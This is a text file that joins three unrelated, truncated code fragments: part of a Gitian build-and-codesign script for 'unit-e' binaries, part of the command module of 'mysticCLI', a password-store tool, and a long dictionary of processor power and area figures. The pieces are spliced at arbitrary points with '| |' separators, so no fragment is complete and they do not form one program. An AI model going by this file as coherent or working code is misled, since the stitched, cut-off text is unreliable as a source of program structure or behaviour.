if not Path(user_spec_path).is_file():
raise Exception('provided osslsign does not exists: {}'.format(user_spec_path))
try:
if subprocess.call([user_spec_path, '--version'], stderr=subprocess.DEVNULL) != 255:
raise Exception('cannot execute provided osslsigncode: {}'.format(user_spec_path))
except subprocess.CalledProcessError as e:
raise Exception('unexpected exception raised while executing provided osslsigncode: {}'.format(str(e)))
return Path(user_spec_path).resolve()
def find_osslsigncode(user_spec_path):
if user_spec_path:
return verify_user_specified_osslsigncode(user_spec_path)
which_ossl_proc = subprocess.Popen(['which', 'osslsigncode'], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
if which_ossl_proc.wait() == 0:
ossl_path = which_ossl_proc.communicate()[0].split()[0].decode()
if subprocess.call([ossl_path, '--version'], stderr=subprocess.DEVNULL) == 255:
return ossl_path
expected_path = Path(OSSLSIGNCODE_DIR, 'osslsigncode')
if expected_path.is_file() and subprocess.call([expected_path, '--version'], stderr=subprocess.DEVNULL) == 255:
return expected_path.resolve()
return None
def install_osslsigner():
subprocess.check_call(['wget', '-N', 'https://downloads.sourceforge.net/project/osslsigncode/osslsigncode/osslsigncode-'+OSSLSIGNCODE_VER+'.tar.gz'])
subprocess.check_call(['wget', '-N', 'https://bitcoincore.org/cfields/osslsigncode-Backports-to-'+OSSLSIGNCODE_VER+'.patch'])
subprocess.check_call(["echo 'a8c4e9cafba922f89de0df1f2152e7be286aba73f78505169bc351a7938dd911 osslsigncode-Backports-to-"+OSSLSIGNCODE_VER+".patch' | sha256sum -c"], shell=True)
subprocess.check_call(["echo 'f9a8cdb38b9c309326764ebc937cba1523a3a751a7ab05df3ecc99d18ae466c9 osslsigncode-"+OSSLSIGNCODE_VER+".tar.gz' | sha256sum -c"], shell=True)
subprocess.check_call(['tar', '-xzf', 'osslsigncode-'+OSSLSIGNCODE_VER+'.tar.gz'])
subprocess.check_call(['patch -p1 < ../osslsigncode-Backports-to-'+OSSLSIGNCODE_VER+'.patch'], shell=True, cwd=OSSLSIGNCODE_DIR)
subprocess.check_call(['./configure', '--without-gsf', '--without-curl', '--disable-dependency-tracking'], cwd=OSSLSIGNCODE_DIR)
subprocess.check_call(['make'], cwd=OSSLSIGNCODE_DIR)
return Path(OSSLSIGNCODE_DIR, 'osslsigncode').resolve()
def install_libssl_dev(apt):
dist_str = platform.dist()
dist_type = dist_str[0]
dist_no = int(dist_str[1].replace('.', ''))
if dist_type == 'Ubuntu' and dist_no < 1800 or dist_type == 'Debian' and dist_no < 900:
apt.add_requirements('libssl-dev')
else:
apt.add_requirements('libssl1.0-dev')
def install_linux_deps(args):
apt = Installer(backend='apt', quiet=args.quiet)
apt.add_requirements('ruby', 'git', 'make')
if args.kvm:
apt.add_requirements('apt-cacher-ng', 'python-vm-builder', 'qemu-kvm', 'qemu-utils')
elif args.docker:
if subprocess.call(['docker', '--version']) != 0:
if not apt.try_to_install('docker.io') and not apt.try_to_install('docker-ce'):
print('Cannot find any way to install docker', file=sys.stderr)
exit(1)
else:
apt.add_requirements('apt-cacher-ng', 'lxc', 'debootstrap')
should_make_ossl = False
if args.codesign and args.windows:
args.osslsigncode_path = find_osslsigncode(args.osslsigncode_path)
if not args.osslsigncode_path:
should_make_ossl = True
apt.add_requirements('tar', 'wget', 'patch', 'autoconf')
install_libssl_dev(apt)
apt.batch_install()
if should_make_ossl:
args.osslsigncode_path = install_osslsigner()
def create_bin_symlink(link, target):
bin_path = Path("bin", link)
if not bin_path.exists():
bin_path.symlink_to(target)
def install_mac_deps(args):
if not args.docker:
print('Mac can only work with docker, re-run with --docker flag.', file=sys.stderr)
exit(1)
if subprocess.call(['docker', '--version']) != 0:
print('Please install docker manually, e.g. with `brew cask install docker`.', file=sys.stderr)
exit(1)
brew = Installer(backend='brew')
brew.add_requirements('ruby', 'coreutils')
brew.batch_install()
create_bin_symlink("date", "/usr/local/bin/gdate")
create_bin_symlink("sha256sum", "/usr/local/bin/gsha256sum")
def install_deps(args):
system_str = platform.system()
if system_str == 'Linux':
install_linux_deps(args)
elif system_str == 'Darwin':
install_mac_deps(args)
else:
print("Unsupported system '%s'." % system_str, file=sys.stderr)
exit(1)
def setup(args):
install_deps(args)
if not Path('unit-e-sigs').is_dir():
subprocess.check_call(['git', 'clone', '<EMAIL>:dtr-org/unit-e-sigs.git'])
if not Path('gitian-builder').is_dir():
subprocess.check_call(['git', 'clone', 'https://github.com/devrandom/gitian-builder.git'])
if not Path(args.git_dir).is_dir():
subprocess.check_call(['git', 'clone', args.url, args.git_dir])
make_image_prog = ['bin/make-base-vm', '--suite', 'bionic', '--arch', 'amd64']
if args.docker:
make_image_prog += ['--docker']
elif not args.kvm:
make_image_prog += ['--lxc']
subprocess.check_call(make_image_prog, cwd='gitian-builder')
if args.is_bionic and not args.kvm and not args.docker:
subprocess.check_call(['sudo', 'sed', '-i', 's/lxcbr0/br0/', '/etc/default/lxc-net'])
print('Reboot is required')
exit(0)
def gitian_descriptors(args, platform_str):
return '../work/gitian-descriptors/gitian-' + platform_str + '.yml'
def build(args):
os.makedirs('unit-e-binaries/' + args.version, exist_ok=True)
print('\nBuilding Dependencies\n')
with cd('gitian-builder'):
os.makedirs('inputs', exist_ok=True)
subprocess.check_call(['make', '-C', Path('../', args.git_dir, 'depends'), 'download', 'SOURCES_PATH=' + os.getcwd() + '/cache/common'])
if args.linux:
print('\nCompiling ' + args.version + ' Linux')
subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'unit-e='+args.commit, '--url', 'unit-e='+args.url, gitian_descriptors(args, 'linux')])
subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-linux', '--destination', '../unit-e-sigs/', gitian_descriptors(args, 'linux')])
subprocess.check_call('mv build/out/unit-e-*.tar.gz build/out/src/unit-e-*.tar.gz ../unit-e-binaries/'+args.version, shell=True)
if args.windows:
print('\nCompiling ' + args.version + ' Windows')
subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'unit-e='+args.commit, '--url', 'unit-e='+args.url, gitian_descriptors(args, 'win')])
subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-win-unsigned', '--destination', '../unit-e-sigs/', gitian_descriptors(args, 'win')])
subprocess.check_call('mv build/out/unit-e-*-win-unsigned.tar.gz inputs/', shell=True)
subprocess.check_call('mv build/out/unit-e-*.zip build/out/unit-e-*.exe ../unit-e-binaries/'+args.version, shell=True)
if args.macos:
print('\nCompiling ' + args.version + ' MacOS')
subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'unit-e='+args.commit, '--url', 'unit-e='+args.url, gitian_descriptors(args, 'osx')])
subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-osx-unsigned', '--destination', '../unit-e-sigs/', gitian_descriptors(args, 'osx')])
subprocess.check_call('mv build/out/unit-e-*.tar.gz ../unit-e-binaries/'+args.version, shell=True)
if args.commit_files:
print('\nCommitting '+args.version+' Unsigned Sigs\n')
with cd('unit-e-sigs'):
if args.linux:
subprocess.check_call(['git', 'add', args.version+'-linux/'+args.signer])
if args.windows:
subprocess.check_call(['git', 'add', args.version+'-win-unsigned/'+args.signer])
if args.macos:
subprocess.check_call(['git', 'add', args.version+'-osx-unsigned/'+args.signer])
subprocess.check_call(['git', 'commit', '-m', 'Add '+args.version+' unsigned sigs for '+args.signer])
def get_signatures_path(platform_str, version):
return Path('unit-e-sigs', version + '-detached', 'unit-e-'+platform_str+'-signatures.tar.gz').resolve()
def codesign_windows(osslsign_path, version, win_code_cert_path, win_code_key_path):
gitian_dir = Path('gitian-builder').resolve()
signatures_tarball = get_signatures_path('win', version)
if signatures_tarball.is_file():
print('Signatures already present at:', signatures_tarball, '\nI cowardly refuse to continue', file=sys.stderr)
exit(1)
signatures_tarball.parent.mkdir(exist_ok=True)
print('\nSigning ' + version + ' Windows')
with tempfile.TemporaryDirectory() as build_dir:
subprocess.check_call(['cp', 'inputs/unit-e-' + version + '-win-unsigned.tar.gz', Path(build_dir, 'unit-e-win-unsigned.tar.gz')], cwd=gitian_dir)
subprocess.check_call(['tar', '-xzf', 'unit-e-win-unsigned.tar.gz'], cwd=build_dir)
for fp in Path(build_dir).glob('unsigned/*.exe'):
subprocess.check_call([osslsign_path, 'sign', '-certs', win_code_cert_path, '-in', fp, '-out', str(fp)+'-signed', '-key', win_code_key_path, '-askpass'])
subprocess.check_call([osslsign_path, 'extract-signature', '-pem', '-in', str(fp)+'-signed', '-out', str(fp)+'.pem'])
subprocess.check_call(['tar', '-czf', signatures_tarball, *[path.name for path in Path(build_dir, 'unsigned').glob('*.exe.pem')]], cwd=Path(build_dir, 'unsigned'))
def codesign(args):
if not args.windows:
print('Warning: codesigning requested, but windows not in the --os flag.', file=sys.stderr)
return
codesign_windows(args.osslsigncode_path, args.version, args.win_code_cert_path, args.win_code_key_path)
if args.commit_files:
print('\nCommitting '+args.version+' Detached Sigs\n')
subprocess.check_call(['git', 'add', Path(args.version + '-detached', 'unit-e-win-signatures.tar.gz')], cwd='unit-e-sigs')
subprocess.check_call(['git', 'commit', '-a', '-m', 'Add '+args.version+' detached signatures by '+args.signer], cwd='unit-e-sigs')
def sign(args):
if not args.windows:
print('Warning: signing requested, but windows not in the --os flag.', file=sys.stderr)
return
gitian_dir = Path('gitian-builder').resolve()
subprocess.check_call(['wget', '-N', '-P', 'inputs', 'https://downloads.sourceforge.net/project/osslsigncode/osslsigncode/osslsigncode-'+OSSLSIGNCODE_VER+'.tar.gz'], cwd=gitian_dir)
subprocess.check_call(['wget', '-N', '-P', 'inputs', 'https://bitcoincore.org/cfields/osslsigncode-Backports-to-'+OSSLSIGNCODE_VER+'.patch'], cwd=gitian_dir)
signatures_tarball = get_signatures_path('win', args.version)
if not signatures_tarball.is_file():
print('Signatures not present at:', signatures_tarball, file=sys.stderr)
exit(1)
print('\nSigning ' + args.version + ' Windows')
subprocess.check_call(['cp', signatures_tarball, 'inputs/unit-e-win-signatures.tar.gz'], cwd=gitian_dir)
subprocess.check_call(['cp', 'inputs/unit-e-' + args.version + '-win-unsigned.tar.gz', 'inputs/unit-e-win-unsigned.tar.gz'], cwd=gitian_dir)
subprocess.check_call(['bin/gbuild', '-i', '--commit', 'signature=master', gitian_descriptors(args, 'win-signer')], cwd=gitian_dir)
subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-win-signed', '--destination', '../unit-e-sigs/', gitian_descriptors(args, 'win-signer')], cwd=gitian_dir)
subprocess.check_call('mv build/out/unit-e-*win64-setup.exe ../unit-e-binaries/'+args.version, shell=True, cwd=gitian_dir)
subprocess.check_call('mv build/out/unit-e-*win32-setup.exe ../unit-e-binaries/'+args.version, shell=True, cwd=gitian_dir)
if args.commit_files:
print('\nCommitting '+args.version+' Signed Sigs\n')
subprocess.check_call(['git', 'add', args.version+'-win-signed/'+args.signer], cwd='unit-e-sigs')
subprocess.check_call(['git', 'commit', '-a', '-m', 'Add '+args.version+' signed binary sigs for '+args.signer], cwd='unit-e-sigs')
def verify(args):
""" Verify the builds. Exits with error in case any of the signatures fail to verify and if any of the signatures are missing. """
gitian_builder = Path('gitian-builder')
sigs_path = Path('unit-e-sigs')
builds_were_missing = False
for (sig_path_suffix, descriptor_suffix, build_name) in [
('linux', 'linux', 'Linux'),
('win-unsigned', 'win', 'Windows'),
('osx-unsigned', 'osx', 'MacOS'),
('win-signed', 'win-signer', 'Signed Windows'),
]:
build_sig_dir = args.version + '-' + sig_path_suffix
if Path(sigs_path, build_sig_dir).is_dir():
print('\nVerifying v{} {}\n'.format(args.version, build_name))
descriptor = gitian_descriptors(args, descriptor_suffix)
subprocess.check_call(['bin/gverify', '-v', '-d', '../unit-e-sigs/', '-r', build_sig_dir, descriptor], cwd=gitian_builder)
else:
print('\nSkipping v{} {} as it is not present\n'.format(args.version, build_name))
builds_were_missing = True
if builds_were_missing:
print('Some builds were missing, please refer to previous logs.', file=sys.stderr)
exit(1)
def prepare_git_dir(args):
with cd(args.git_dir):
if args.pull:
subprocess.check_call(['git', 'fetch', args.url, 'refs/pull/'+args.version+'/merge'])
os.chdir('../gitian-builder/inputs/unit-e')
subprocess.check_call(['git', 'fetch', args.url, 'refs/pull/'+args.version+'/merge'])
args.commit = subprocess.check_output(['git', 'show', '-s', '--format=%H', 'FETCH_HEAD'], universal_newlines=True, encoding='utf8').strip()
args.version = 'pull-' + args.version
print(args.commit)
if not args.skip_checkout:
subprocess.check_call(['git', 'fetch'])
subprocess.check_call(['git', 'checkout', args.commit])
# Use only keyword-only arguments as defined in PEP 3102 to avoid accidentally swapping of arguments
def prepare_gitian_descriptors(*, source, target, hosts=None):
descriptor_source_dir = Path(source)
descriptor_dir = Path(target)
if not descriptor_source_dir.is_dir():
raise Exception("Gitian descriptor dir '%s' does not exist" % descriptor_source_dir)
descriptor_dir.mkdir(parents=True, exist_ok=True)
for descriptor_path in descriptor_source_dir.glob("*.yml"):
filename = descriptor_path.relative_to(descriptor_source_dir)
descriptor_in = descriptor_source_dir / filename
descriptor_out = descriptor_dir / filename
with descriptor_out.open("w") as file_out, descriptor_in.open() as file_in:
for line in file_in:
if hosts and line.startswith(' HOSTS='):
file_out.write(' HOSTS="%s"\n' % hosts)
else:
file_out.write(line)
def create_work_dir(work_dir):
work_dir = Path(work_dir)
if Path(work_dir).exists() and not Path(work_dir).is_dir():
raise Exception("Work dir '%s' exists but is not a directory." % work_dir)
if not work_dir.exists():
print("Creating working directory '%s'" % work_dir)
work_dir.mkdir()
return work_dir.resolve()
def main():
parser = argparse.ArgumentParser(usage='%(prog)s [options]')
parser.add_argument('-c', '--commit', action='store_true', dest='commit', help='Indicate that the version argument is for a commit or branch')
parser.add_argument('-p', '--pull', action='store_true', dest='pull', help='Indicate that the version | |
<reponame>bentheiii/mystic<filename>mysticCLI/commands.py
from __future__ import annotations
from typing import Dict, Type
import re
import textwrap
import os.path
import cryptography
try:
import pyperclip
except ImportError:
pyperclip = None
try:
import tkinter as tk
from tkinter import filedialog as tk_filedialog
except ImportError:
tk = None
from mysticlib import Mystic
import mysticlib
from mysticCLI.resettable_timer import ResettableTimer
from mysticCLI.__util import *
import mysticCLI.__data as data
class Command:
all: Dict[str, Command] = {}
def __init__(self, func):
assert func.__name__ not in self.all, f'{func} overrides another command'
self.all[func.__name__] = self
self.sign = get_command_sign(func)
self.help = textwrap.dedent(func.__doc__)
self.func = func
def __call__(self, *args, **kwargs):
return self.func(*args, **kwargs)
@Command
def add_password(*, myst: Mystic, **kwargs):
"""
Add a password to the mystic. Takes no arguments. You will be prompted to enter the new password. If a password already exists, you will be prompted to enter it too.
"""
if not myst.mutable:
return 'the myst is in read-only mode, use the enable_write command to enable editing'
myst.add_password()
return 'new password added'
@Command
def del_password(*, myst: Mystic, **kwargs):
"""
Delete a password from the mystic. Takes no arguments. Yuo will be prompted to enter the password to delete. You cannot delete the only password, add a password beforehand.
"""
if not myst.mutable:
return 'the myst is in read-only mode, use the enable_write command to enable editing'
myst.del_password()
return 'password deleted'
@Command
def get(key, *, myst: Mystic, **kwargs):
"""
Retrieve the value of a specific key. Note that the key must match exactly, use either search or lookup for a fuzzy search. Takes the key as a single argument.
"""
return myst[key]
def _search(myst, pattern):
p = re.compile(pattern)
results = []
for k, v in myst.items():
if p.search(k):
results.append((k, v))
if len(results) == 0:
return 'no results found matching pattern'
if len(results) == 1:
return results[0]
for i, (k, _) in enumerate(results):
print(f'{i}\t{k}')
while True:
i = input('enter the number of the key, or "x" to cancel search\n')
if i == 'x':
return 'search cancelled'
try:
i = int(i)
ret = results[i]
except ValueError:
print('invalid number')
except IndexError:
print('index out of bounds')
else:
break
return ret
@Command
def search(pattern, *, myst: Mystic, **kwargs):
"""
Search for a key in the mystic. Prompting you for all the possible keys matching a regular expression pattern. Accepts a regex pattern.
"""
r = _search(myst, pattern)
if isinstance(r, str):
return r
k, v = r
return f'{k}: {v}'
def _lookup(myst, auto_display_thresh=10, start=''):
orig_cands = set(myst.items())
candidates = set(orig_cands)
pattern = start
while True:
if len(candidates) == 0:
if pattern == '':
return 'no candidates'
response = input(f'no valid candidates for pattern {pattern}, go back one? [y/n]\n').lower()
if response == 'y':
pattern = pattern[:-1]
candidates = {(k, v) for (k, v) in orig_cands if (pattern in k)} # todo fuzzy search
continue
return 'lookup cancelled'
if len(candidates) == 1:
return next(iter(candidates))
next_letters = None
if len(candidates) < auto_display_thresh:
disp = True
else:
response = input(
f'there are {len(candidates)} candidates, enter #d to display, letters to continue searching, or #x to cancel\n')
if response == '#d':
disp = True
elif response == '#x':
return 'lookup cancelled'
else:
disp = False
next_letters = response
if disp:
assert next_letters is None
print('query: ' + pattern)
c = sorted(candidates, key=lambda x: x[0])
for i, (k, _) in enumerate(c):
print(f'#{i}\t{k}')
while next_letters is None:
response = input(
'enter the number (starting with #) to access that key, #x to cancel, or letters to continue searching\n')
if response == '#x':
return 'lookup cancelled'
if response.startswith('#'):
response = response[1:]
try:
ret = int(response)
return c[ret]
except ValueError:
print('could not parse number ' + response)
except IndexError:
print('out of bounds')
next_letters = response
assert next_letters is not None
pattern += next_letters
for k, _ in list(candidates):
if pattern not in k: # todo fuzzy search
candidates.remove((k, _))
@Command
def lookup(start='', *, myst, **kwargs):
"""
Search for a key in the mystic. Prompting you for additional letters to search for until only a few remain. Accepts an optional first characters to begin the search with.
"""
r = _lookup(myst, start=start)
if isinstance(r, str):
return r
k, v = r
return f'{k}: {v}'
@Command
def add(key=None, value=None, *, myst, getpass, **kwargs):
"""
Add a new key-value pair. Accepts a optional key and an optional value for the key. If the key or value is not entered, a secure input will be prompted to enter them.
"""
if not myst.mutable:
return 'the myst is in read-only mode, use the enable_write command to enable editing'
if key is None:
key = getpass('enter the key\n')
if key in myst:
return 'key already exists, use update or set_pair to change existing pairs'
if value is None:
value = getpass(f'enter the value\n')
myst[key] = value
return 'pair added'
@Command
def update(key=None, value=None, *, myst, getpass, **kwargs):
"""
Update a key-value pair to a new value. Accepts a optional key and an optional value for the key. If the key or value is not entered, a secure input will be prompted to enter them. If the value ends with a '[', the previous value will be appended to its new value in square brackets.
"""
if not myst.mutable:
return 'the myst is in read-only mode, use the enable_write command to enable editing'
if key is None:
key = getpass('enter the key\n')
if key not in myst:
return 'key does not exists, use add or set_pair to add new pairs'
if value is None:
value = getpass(f'enter the value\n')
if value.endswith('['):
value = value + myst[key] + ']'
myst[key] = value
return 'pair updated'
@Command
def update_search(pattern, value=None, *, myst, getpass, **kwargs):
"""
Update a key-value pair to a new value, searching for the key with a regex pattern. Accepts a regular expression pattern and an optional value. If the value is not provided, a secure input will be prompted to enter it. If the value ends with a '[', the previous value will be appended to its new value in square brackets.
"""
if not myst.mutable:
return 'the myst is in read-only mode, use the enable_write command to enable editing'
r = _search(myst, pattern)
if isinstance(r, str):
return r
key, prev = r
if value is None:
value = getpass(f'enter the value\n')
if value.endswith('['):
value = value + prev + ']'
myst[key] = value
return 'pair updated'
@Command
def update_lookup(value=None, *, myst, getpass, **kwargs):
"""
Update a key-value pair to a new value, looking for the key via simple search. Accepts an optional value. If the value is not provided, a secure input will be prompted to enter it. If the value ends with a '[', the previous value will be appended to its new value in square brackets.
"""
if not myst.mutable:
return 'the myst is in read-only mode, use the enable_write command to enable editing'
r = _lookup(myst)
if isinstance(r, str):
return r
key, prev = r
if value is None:
value = getpass(f'enter the value\n')
if value.endswith('['):
value = value + prev + ']'
myst[key] = value
return 'pair updated'
@Command
def set_pair(key=None, value=None, *, myst, getpass, **kwargs):
"""
Set a key-value pair to a new value, regardless of whether the key already exists. Accepts an optional key and an optional value for the key. If the key or value is not entered, a secure input will be prompted to enter them.
"""
if not myst.mutable:
return 'the myst is in read-only mode, use the enable_write command to enable editing'
if key is None:
key = getpass('enter the key\n')
if value is None:
value = getpass(f'enter the value\n')
myst[key] = value
return 'pair set'
@Command
def quit(*, myst: Mystic, **kwargs):
"""
Exit the mysticCLI. Will prompt if any unsaved changes are recorded.
"""
if myst.changed():
response = input('unsaved changes are recorded, press enter to continue, enter anything to cancel\n').lower()
if response:
return ''
return False
@Command
def save(path=None, *, myst: Mystic, timer: ResettableTimer, source_path=None, **kwargs):
"""
Will save the mystic to a file. Accepts a path for the file. If the path is not provided, the mystic's source path will be used, if available. | |
Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.228254,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.76697,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.174264,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.281081,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.14188,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.597225,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.199307,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.21288,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00730941,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0528562,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0540576,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0528562,
'Execution Unit/Register Files/Runtime Dynamic': 0.061367,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.111353,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.291709,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.55837,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00233591,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00233591,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00211747,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000865042,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000776541,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00756582,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0194348,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
